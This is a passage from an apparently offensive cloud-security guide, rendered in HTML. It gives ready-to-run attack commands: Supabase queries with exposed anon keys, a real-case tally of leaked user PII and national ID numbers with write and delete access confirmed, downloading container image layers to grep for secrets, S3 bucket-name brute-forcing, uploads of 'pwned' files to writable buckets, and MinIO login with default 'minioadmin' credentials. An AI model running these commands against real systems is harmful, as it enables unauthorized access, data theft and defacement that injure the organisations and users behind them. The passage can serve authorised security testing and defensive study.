&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -d &lt;span style="color:#a6d189"&gt;&amp;#39;{&amp;#34;email&amp;#34;:&amp;#34;test@test.com&amp;#34;,&amp;#34;password&amp;#34;:&amp;#34;Test123!&amp;#34;}&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Storage — list buckets&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://&lt;/span&gt;&lt;span style="color:#a6d189"&gt;${&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;PROJECT&lt;/span&gt;&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;.supabase.co/storage/v1/bucket&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;apikey: &lt;/span&gt;&lt;span style="color:#a6d189"&gt;${&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;ANON_KEY&lt;/span&gt;&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;Authorization: Bearer &lt;/span&gt;&lt;span style="color:#a6d189"&gt;${&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;ANON_KEY&lt;/span&gt;&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Real-world case (CRITICAL)&lt;/strong&gt;: Traffic management platform — Supabase with RLS turned off. Anon key exposed in the JS bundle.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;64,105 users&lt;/strong&gt;: id, name, email, phone, company, role&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;46,717 reports&lt;/strong&gt;: url_pdf (public), radar data&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;676 purchases&lt;/strong&gt;: CPF (SSN), address, phone, product, amount&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;232,000+ questionnaire responses&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;UPDATE and DELETE&lt;/strong&gt; confirmed (worked with anon key)&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Open SignUp&lt;/strong&gt;: anyone could create an account&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h2 id="12-cloud-run-containers--artifact-registry" &gt;
&lt;div&gt;
&lt;a href="#12-cloud-run-containers--artifact-registry"&gt;
#
&lt;/a&gt;
12. CLOUD RUN, CONTAINERS &amp;amp; ARTIFACT REGISTRY
&lt;/div&gt;
&lt;/h2&gt;
&lt;h3 id="121-list-cloud-run-services" &gt;
&lt;div&gt;
&lt;a href="#121-list-cloud-run-services"&gt;
##
&lt;/a&gt;
12.1 List Cloud Run Services
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-javascript" data-lang="javascript"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;const&lt;/span&gt; {v2} &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; require(&lt;span style="color:#a6d189"&gt;&amp;#39;@google-cloud/run&amp;#39;&lt;/span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;const&lt;/span&gt; client &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ca9ee6"&gt;new&lt;/span&gt; v2.ServicesClient({credentials&lt;span style="color:#99d1db;font-weight:bold"&gt;:&lt;/span&gt; sa});
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;const&lt;/span&gt; [services] &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ca9ee6"&gt;await&lt;/span&gt; client.listServices({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; parent&lt;span style="color:#99d1db;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#39;projects/&amp;#39;&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;+&lt;/span&gt; projectId &lt;span style="color:#99d1db;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#39;/locations/us-central1&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;});
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; (&lt;span style="color:#ca9ee6"&gt;const&lt;/span&gt; svc &lt;span style="color:#ca9ee6"&gt;of&lt;/span&gt; services) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; console.log(svc.name, svc.uri, svc.ingress);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#737994;font-style:italic"&gt;// ingress: &amp;#34;all&amp;#34; = public, &amp;#34;internal&amp;#34; = VPC only
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="122-artifact-registry--download-and-analyze-images" &gt;
&lt;div&gt;
&lt;a href="#122-artifact-registry--download-and-analyze-images"&gt;
##
&lt;/a&gt;
12.2 Artifact Registry — Download and Analyze Images
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# List repositories&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;r &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;https://artifactregistry.googleapis.com/v1/projects/&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;project&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;/locations/&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;region&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;/repositories&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; headers&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a6d189"&gt;&amp;#39;Authorization&amp;#39;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;Bearer &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;token&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Download specific image manifest&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;digest &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;sha256:XXXXX&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;r &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;https://&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;region&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;-docker.pkg.dev/v2/&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;project&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;/&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;repo&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;/&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;image&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;/manifests/&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;digest&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; headers&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a6d189"&gt;&amp;#39;Authorization&amp;#39;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;Bearer &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;token&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#39;Accept&amp;#39;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#39;application/vnd.docker.distribution.manifest.v2+json&amp;#39;&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Download layers&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; i, layer &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; &lt;span style="color:#99d1db"&gt;enumerate&lt;/span&gt;(r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;json()&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(&lt;span style="color:#a6d189"&gt;&amp;#39;layers&amp;#39;&lt;/span&gt;, [])):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; r2 &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;https://&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;region&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;-docker.pkg.dev/v2/&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;project&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;/&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;repo&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;/&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;image&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;/blobs/&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;layer[&lt;span style="color:#a6d189"&gt;&amp;#34;digest&amp;#34;&lt;/span&gt;]&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; headers&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a6d189"&gt;&amp;#39;Authorization&amp;#39;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;Bearer &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;token&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;with&lt;/span&gt; &lt;span style="color:#99d1db"&gt;open&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;/tmp/layer_&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;i&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;.tar.gz&amp;#39;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#39;wb&amp;#39;&lt;/span&gt;) &lt;span style="color:#ca9ee6"&gt;as&lt;/span&gt; f:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; f&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;write(r2&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;content)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Extract and search for secrets&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# tar -xzf layer.tar.gz&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# grep -r &amp;#34;MIGRATION_TOKEN\|APP_KEY\|DB_PASSWORD\|secret\|password&amp;#34; . --include=&amp;#34;*.js&amp;#34; --include=&amp;#34;*.ts&amp;#34; --include=&amp;#34;*.json&amp;#34; --include=&amp;#34;.env&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;hr&gt;
&lt;h2 id="13-s3--minio--blob-storage" &gt;
&lt;div&gt;
&lt;a href="#13-s3--minio--blob-storage"&gt;
#
&lt;/a&gt;
13. S3 / MINIO / BLOB STORAGE
&lt;/div&gt;
&lt;/h2&gt;
&lt;h3 id="131-s3--aws" &gt;
&lt;div&gt;
&lt;a href="#131-s3--aws"&gt;
##
&lt;/a&gt;
13.1 S3 — AWS
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Test if bucket is public&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://bucket-name.s3.amazonaws.com/&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If XML with &amp;lt;ListBucketResult&amp;gt; is returned → PUBLIC LISTING&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Upload (if writable)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -X PUT &lt;span style="color:#a6d189"&gt;&amp;#34;http://bucket-name.s3.amazonaws.com/test.txt&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;Content-Type: text/plain&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -d &lt;span style="color:#a6d189"&gt;&amp;#34;pwned&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Test common bucket names&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f2d5cf"&gt;buckets&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;=(&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;target&amp;#34;&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;target-prod&amp;#34;&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;target-dev&amp;#34;&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;target-images&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;target-uploads&amp;#34;&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;target-backup&amp;#34;&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;target-media&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;download.target.com&amp;#34;&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;static.target.com&amp;#34;&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; b in &lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#a6d189"&gt;${&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;buckets&lt;/span&gt;[@]&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;; &lt;span style="color:#ca9ee6"&gt;do&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f2d5cf"&gt;r&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ca9ee6"&gt;$(&lt;/span&gt;curl -sk -o /dev/null -w &lt;span style="color:#a6d189"&gt;&amp;#34;%{http_code}&amp;#34;&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;https://&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$b&lt;/span&gt;&lt;span style="color:#a6d189"&gt;.s3.amazonaws.com/&amp;#34;&lt;/span&gt; 2&amp;gt;/dev/null&lt;span style="color:#ca9ee6"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;if&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;[&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; !&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;404&amp;#34;&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;]&lt;/span&gt;; &lt;span style="color:#ca9ee6"&gt;then&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;echo&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$b&lt;/span&gt;&lt;span style="color:#a6d189"&gt; -&amp;gt; HTTP &lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;fi&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;done&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="132-minio-s3-compatible-common-on-vps" &gt;
&lt;div&gt;
&lt;a href="#132-minio-s3-compatible-common-on-vps"&gt;
##
&lt;/a&gt;
13.2 MinIO (S3-compatible, common on VPS)
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Health check&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sI &lt;span style="color:#a6d189"&gt;&amp;#34;http://host:9000/minio/health/live&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Admin API (versions v1, v3)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://host:9000/minio/admin/v3/info&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Web console login (port 9001)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://host:9001/api/v1/login&amp;#34;&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# GET → {&amp;#34;loginStrategy&amp;#34;:&amp;#34;form&amp;#34;}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -X POST &lt;span style="color:#a6d189"&gt;&amp;#34;http://host:9001/api/v1/login&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;Content-Type: application/json&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -d &lt;span style="color:#a6d189"&gt;&amp;#39;{&amp;#34;accessKey&amp;#34;:&amp;#34;minioadmin&amp;#34;,&amp;#34;secretKey&amp;#34;:&amp;#34;minioadmin&amp;#34;}&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# List bucket objects&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://host:9000/bucket-name?list-type=2&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Upload&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -X PUT &lt;span style="color:#a6d189"&gt;&amp;#34;http://host:9000/bucket-name/file.html&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;Content-Type: text/html; charset=utf-8&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -d &lt;span style="color:#a6d189"&gt;&amp;#34;&amp;lt;h1&amp;gt;Pwned&amp;lt;/h1&amp;gt;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="133-azure-blob-storage" &gt;
&lt;div&gt;
&lt;a href="#133-azure-blob-storage"&gt;
##
&lt;/a&gt;
13.3 Azure Blob Storage
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# URL pattern&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# https://{storage_account}.blob.core.windows.net/{container}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Test public listing&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://storageaccount.blob.core.windows.net/container?restype=container&amp;amp;comp=list&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="134-ssrf-via-public-buckets" &gt;
&lt;div&gt;
